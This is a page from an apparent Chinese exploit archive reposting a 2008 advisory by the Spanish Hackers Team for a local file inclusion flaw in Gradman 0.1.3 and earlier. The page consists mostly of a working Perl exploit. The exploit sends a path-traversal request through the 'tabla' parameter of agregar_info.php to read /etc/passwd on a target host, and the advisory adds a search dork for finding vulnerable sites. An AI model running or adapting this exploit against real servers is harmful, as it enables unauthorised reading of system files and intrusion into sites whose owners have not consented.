首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

Gradman <= 0.1.3 (agregar_info.php) Local File Inclusion Exploit


http://www.gipsky.com/
--== =================== Spanish Hackers Team (www.spanish-hackers.com) ================= ==--
--== Gradman <= 0.1.3 (agregar_info.php?tabla=) Local File Inclusion Exploit ==--
--== ==================================================================================== ==--
[ ] [JosS] [Spanish Hackers Team] [Sys - Project]

[ ] Info:

[~] Software: Gradman <= 0.1.3
[~] HomePage: http://gradman.xe1ido.com.mx/
[~] Exploit: Local File Inclusion [High]
[~] Where: agregar_info.php?tabla=
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Dork: "powered by Gradman"
[~] Dork2: Priv8, xD!


[ ] Exploit:

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

print "\t\t########################################################\n\n";
print "\t\t# Gradman <= 0.1.3 - Local File Inclusion Exploit #\n\n";
print "\t\t# by JosS #\n\n";
print "\t\t########################################################\n\n";


if (!$ARGV[0])
{
print "Usage: perl xpl.pl [HOST]\n";
print "Example: perl xpl.pl http://localhost/gradman/\n";
}

else
{

$web=$ARGV[0];
chomp $web;

$iny="agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd";

my $web1=$web.$iny;
print "$web1\n\n";
my $ua = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $ua->request($req)->as_string;

if ($doc=~ /^root/moxis ){
print "Web is vuln\n";
}
else
{
print "Web is not vuln\n";
}

}


--== =================== Spanish Hackers Team (www.spanish-hackers.com) ================= ==--
--== JosS ==--
--== ==================================================================================== ==--
[ ] [The End]

[2008-01-16]
<< PHP-RESIDENCE 0.7.2 (Search) Remote SQL Injection Vulnerability MyBulletinBoard (MyBB) <= 1.2.10 Remote Code Execution Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8